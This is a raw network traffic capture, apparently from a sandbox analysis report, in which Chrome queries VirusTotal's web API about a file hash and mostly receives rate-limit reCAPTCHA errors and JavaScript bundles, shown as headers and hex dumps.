                                                                                                                                                                                                                    175192.168.2.164992774.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC597OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 9aec5ff53237de2346fbe5e2a37e2199
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:33 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    176192.168.2.164992874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC583OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?relationships=item%2Cvoter HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: fb82040f5b08de23e5c8ea6208369b69
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:33 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    177192.168.2.164992674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC698OUTGET /gui/icon.types-zip.5dbd88de5aaca441ade4.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: beec0c77207d026aab945f6cd8d5ac17
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Sat, 20 Apr 2024 02:38:25 GMT
                                                                                                                                                                                                                    Expires: Sun, 20 Apr 2025 02:38:25 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 494228
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC1029INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 54 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6f 0d 0a 30 30 30 30 30 30 30 31 0d 0a da 0d 0a 30 30 30 30 30 30 30 31 0d 0a 40 0d 0a 30 30 30 30 30 30 30 31 0d 0a 10 0d 0a 30 30 30 30 30 30 30 31 0d 0a be 0d 0a 30 30 30 30 30 30 30 31 0d 0a e7 0d 0a 30 30 30 30 30 30 30 31
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001T00000001K00000001o0000000100000001@00000001000000010000000100000001
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    178192.168.2.164992974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC617OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 3c3d4ad535c585a4b3da9e8a237cd565
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:33 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    179192.168.2.164993074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:33 UTC693OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files?limit=10&cursor=MTB8fHYzfHwxNzE0MDc0OTMxfHwyNWE1MmNhNDQ4NzE5OWMzYjUwMmU2ZjcwODI4MTNjMTVmMmY0ZmEwYjEyYmE2NDQ4M2Y4MWIyYmIzODFjOGEw HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 103673f151a04be18ee09a7f2afa9f53
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:34 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    180192.168.2.164993174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC617OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: b9a55713f886e9e3621f904854661951
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:34 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    181192.168.2.164993274.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC572OUTGET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC225INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    X-Cloud-Trace-Context: e65123b6e56b758de9f97f6bd8ecd2ff
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:34 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 181
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:34 UTC181INData Raw: 7b 0a 20 20 20 20 22 65 72 72 6f 72 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 63 6f 64 65 22 3a 20 22 52 65 63 61 70 74 63 68 61 52 65 71 75 69 72 65 64 45 72 72 6f 72 22 2c 0a 20 20 20 20 20 20 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 50 6c 65 61 73 65 20 72 65 2d 73 65 6e 64 20 72 65 71 75 65 73 74 20 77 69 74 68 20 61 20 76 61 6c 69 64 20 72 65 43 41 50 54 43 48 41 20 72 65 73 70 6f 6e 73 65 20 69 6e 20 74 68 65 20 5c 22 78 2d 72 65 63 61 70 74 63 68 61 2d 72 65 73 70 6f 6e 73 65 5c 22 20 68 65 61 64 65 72 22 0a 20 20 20 20 7d 0a 7d
                                                                                                                                                                                                                    Data Ascii: { "error": { "code": "RecaptchaRequiredError", "message": "Please re-send request with a valid reCAPTCHA response in the \"x-recaptcha-response\" header" }}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    182192.168.2.164993374.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:36 UTC1008OUTPOST /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/analyse HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Content-Length: 13
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    x-app-version: v1x259x2
                                                                                                                                                                                                                    X-Tool: vt-ui-main
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                    accept: application/json
                                                                                                                                                                                                                    Accept-Ianguage: en-US,en;q=0.9,es;q=0.8
                                                                                                                                                                                                                    X-VT-Anti-Abuse-Header: MTg1ODk0OTQ5MzAtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTM0Ljc3OA==
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Origin: https://www.virustotal.com
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:36 UTC13OUTData Raw: 7b 22 64 61 74 61 22 3a 6e 75 6c 6c 7d
                                                                                                                                                                                                                    Data Ascii: {"data":null}
                                                                                                                                                                                                                    2024-04-25 19:55:36 UTC883INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_ID=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_SESSION_HASH=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    Set-Cookie: VT_AUGMENT=; Domain=.virustotal.com; Expires=Thu, 01-Jan-1970 00:00:00 GMT; Max-Age=0; Path=/
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 47bb638b5bd505c2db0cf72caf6aefe0
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:36 GMT
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Content-Length: 280
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:36 GMT
                                                                                                                                                                                                                    Cache-Control: private
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-04-25 19:55:36 UTC280INData Raw: 7b 0a 20 20 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 22 74 79 70 65 22 3a 20 22 61 6e 61 6c 79 73 69 73 22 2c 0a 20 20 20 20 20 20 20 20 22 69 64 22 3a 20 22 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44 6b 7a 4e 67 3d 3d 22 2c 0a 20 20 20 20 20 20 20 20 22 6c 69 6e 6b 73 22 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 73 65 6c 66 22 3a 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 76 69 72 75 73 74 6f 74 61 6c 2e 63 6f 6d 2f 75 69 2f 61 6e 61 6c 79 73 65 73 2f 4d 6a 67 79 5a 47 45 77 4d 6a 41 33 4f 54 68 68 5a 6d 4a 6b 4e 32 56 6d 5a 6a 51 77 59 32 55 34 4e 54 52 6c 4f 47 51 77 4d 57 59 36 4d 54 63 78 4e 44 41 33 4e 44
                                                                                                                                                                                                                    Data Ascii: { "data": { "type": "analysis", "id": "MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg==", "links": { "self": "https://www.virustotal.com/ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3ND


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    183192.168.2.164993874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:36 UTC689OUTGET /gui/65941.e44934c037380e9ec129.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:37 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a252f2d524f4c68071e8fda6bec3e9c9
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Sat, 20 Apr 2024 02:33:14 GMT
                                                                                                                                                                                                                    Expires: Sun, 20 Apr 2025 02:33:14 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 494543
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
